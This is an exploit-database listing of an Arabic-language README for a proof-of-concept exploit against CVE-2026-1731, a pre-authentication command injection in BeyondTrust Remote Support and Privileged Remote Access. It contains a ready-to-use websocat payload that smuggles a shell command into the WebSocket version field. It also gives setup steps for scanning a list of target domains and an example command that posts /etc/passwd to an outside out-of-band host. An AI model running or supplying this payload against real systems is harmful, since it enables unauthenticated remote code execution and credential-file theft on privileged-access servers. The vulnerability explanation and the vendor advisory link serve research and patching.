Sploitus

Exploit for CVE-2026-1731

kitploit · 2026-09-04

Exploit Code

MARKDOWN110 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WIN3ZZ-CVE-2026-1731
# CVE-2026-1731 BeyondTrust Remote Support Pre-Auth RCE PoC

> [!WARNING] هذا السكربت مخصص للأغراض **التعليمية والبحثية فقط**. لا تستخدمه ضد أنظمة بدون **إذن صريح**. يعد الوصول أو الاختبار غير المصرح به غير قانوني وغير أخلاقي. اقرأ إخلاء المسؤولية الكامل قبل استخدام هذا السكربت.

## نظرة عامة

يوضح هذا السكربت ثغرة حقن أوامر حرجة (CVE-2026-1731) تؤثر على **BeyondTrust Remote Support (RS)** و **Privileged Remote Access (PRA)**. يعود أصل المشكلة إلى نفس نقطة النهاية التي يمكن الوصول إليها عبر WebSocket والتي كانت موضوع الثغرة البارزة سابقًا **CVE-2024-12356** ، ما يجعل هذه الثغرة متغيرًا وثيق الصلة بها.

توجد الثغرة لأن سكربت `thin-scc-wrapper` على الخادم يجري **مقارنات حسابية على مدخلات يتحكم فيها المهاجم** ، وتحديدًا قيمة `remoteVersion` التي تُرسل أثناء مصافحة WebSocket. تتعامل Bash مع المعاملات في المقارنات الرقمية على أنها **تعبيرات** وليس سلاسل نصية عادية، وهو ما يسمح بحمولات مصممة مثل `a[$(cmd)]0` على **تنفيذ أوامر عشوائية** أثناء التقييم.

على الرغم من أن BeyondTrust أضافت فحصًا عدديًا للسلامة في هذه الدورة من التصحيحات، إلا أن ذلك لا يمنع Bash من إجراء تقييم التعبيرات لاحقًا، ما يترك نقطة النهاية قابلة للاستغلال. يمكن للمهاجمين الحصول على تنفيذ للكود بمجرد فتح اتصال WebSocket وإرسال قيمة إصدار خبيثة قبل المصادقة.

#### الحمولة

root@kitploit:~
    
    
    echo -ne "hax[\$(ATTACKER-COMMAND)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | \
    ./websocat -k wss://AFFECTED-SYSTEM:443/nw \
    --protocol "ingredi support desk customer thin" \
    -H "X-Ns-Company: COMPANY-NAME" \
    --binary -n -
    

## الاعتماديات

root@kitploit:~
    
    
    pip3 install requests
    

#### تحميل websocat

root@kitploit:~
    
    
    wget -O websocat https://github.com/vi/websocat/releases/download/v1.14.1/websocat.x86_64-unknown-linux-musl
    chmod +x websocat
    

(ضعه في نفس المجلد الذي يحتوي على سكربت بايثون الخاص بك.)

أو انقله ليكون متاحًا على مستوى النظام:

root@kitploit:~
    
    
    sudo mv websocat /usr/local/bin/
    

#### أنشئ `domains.txt` في نفس المجلد

أضف العناوين التي تريد اختبارها:

root@kitploit:~
    
    
    example1.com
    example2.com
    example3.com
    

## استخدام السكربت

عدّل السطر التالي في السكربت لضبط الأمر الذي تريد أن ينفذه استغلال WebSocket:

root@kitploit:~
    
    
    CMD = "YOUR-COMMAND-HERE"
    

على سبيل المثال:

root@kitploit:~
    
    
    CMD = "curl -X POST -d @/etc/passwd http://XXXXXXXXX.oast.fun/"
    

بمجرد ضبط الأمر، شغّل السكربت:

root@kitploit:~
    
    
    python3 exploit.py
    

أو اجعله قابلًا للتنفيذ وشغّله مباشرة:

root@kitploit:~
    
    
    chmod +x exploit.py
    ./exploit.py
    

![1](https://assets.kitploit.com/production/public/readmes/43028/f827090cb505c721a7851221ab82749758ee621a8f891a684628bf3c45f3fdd3.png) ![2](https://assets.kitploit.com/production/public/readmes/43028/600e1cf84de5a09e705a65be59f18169f4d135eaf68d536835bb3851a18e69dd.png)

## التخفيف

  * https://www.beyondtrust.com/trust-center/security-advisories/bt26-02



## المرجع

  * _التحليل الأصلي_ \- https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis